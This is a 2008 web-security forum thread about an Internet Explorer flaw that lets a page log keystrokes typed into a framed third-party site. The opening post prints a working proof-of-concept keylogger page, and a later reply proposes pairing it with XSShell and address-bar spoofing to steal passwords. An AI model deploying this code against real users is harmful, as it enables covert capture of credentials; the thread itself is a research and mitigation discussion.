IE Cross Frame Scripting Restriction Bypass
Posted by: digi7al64
Date: October 08, 2008 01:32AM

After much debate with a vulnerability assessor in regards to the same domain policy (and the fact I believed it couldn't be bypassed with modern browsers barring a 0-day) I was presented with a link to the following script.

<html>
<head>
<title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog = '';
document.onkeypress = function () {
  var k = window.event.keyCode;
  window.status = keylog += String.fromCharCode(k) + '[' + k + ']';
}
</script>
</head>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.google.com" scrolling="auto">
</frameset>
</html>

http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=77

As you can see (create a PoC) and type something into the search, it can key log data from a 3rd party domain therefore bypassing the same domain policy. This was found back in 2004 and although MS stated they would address the issue all my tests (across multiple IE's) indicate IE (up to 8) is still vulnerable.

bastards!

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 10/08/2008 06:55PM by digi7al64.

Re: IE Cross Frame Scripting Restriction Bypass
Posted by: kuza55
Date: October 09, 2008 07:09PM

Umm, I don't know about you, but I'd throw this in the "don't really care" bucket.

Sure, you can get their keystrokes cross-domain, hell there's a more useful variant where after you inject an iframe, you can then keep stealing focus to get keystrokes, however, in the example you posted, it's pretty irrelevant, since if the user can be tricked into entering sensitive data there, they can be tricked into entering sensitive data on a phishing page, in the iframe-injection scenario, you still need to be able to inject an iframe.

So unless you can think of a viable attack for this, I don't see your point...

A vulnerability isn't really a vulnerability unless someone can exploit it.

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Re: IE Cross Frame Scripting Restriction Bypass
Posted by: Mephisto
Date: October 10, 2008 03:32PM

Implementing "frame busting code" and correct implementation of DIV tags will prevent that issue.

Re: IE Cross Frame Scripting Restriction Bypass
Posted by: digi7al64
Date: October 13, 2008 07:16PM

kuza55 Wrote:
-------------------------------------------------------
> Umm, I don't know about you, but I'd throw this in
> the "don't really care" bucket.
>
> Sure, you can get their keystrokes cross-domain,
> hell there's a more useful variant where after you
> inject an iframe, you can then keep stealing
> focus to get keystrokes, however, in the example
> you posted, it's pretty irrelevant, since if the
> user can be tricked into entering sensitive data
> there, they can be tricked into entering sensitive
> data on a phishing page, in the iframe-injection
> scenario, you still need to be able to inject an
> iframe.
>
> So unless you can think of a viable attack for
> this, I don't see your point...
>
> A vulnerability isn't really a vulnerability
> unless someone can exploit it.


I couldn't agree more. The problem is trying to explain this to a customer when the company doing the pen testing are screaming about how dangerous this really is... which in its essence, is an over complicated phishing attack? However, I am wondering why it wouldn't be patched by MS considering it does not conform to the same domain policy restrictions enforced everywhere else.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: IE Cross Frame Scripting Restriction Bypass
Posted by: TheInsider
Date: December 20, 2008 11:03PM

How CAN YOU NOT think about combining this with XSShell and while the user changes websites he is still under the attackers page and the attacker gets his passwords (emails, networking, shopping...).

Of course the huge catch is the address bar (which displays the first site where the XSS began, but that catch exists for XSShell anyway when the user changes websites).

A combination of this with an address bar spoofing would be flawless :)
If I only had one that I was willing to share :)

http://rafelivgi.blogspot.com
Aspect9 Founder & Chief Security Architect
------------------------------------------
My job is to assess not assassinate
You can spend your life reading what others write or you can spend your life writing for others to read, choose your destiny!
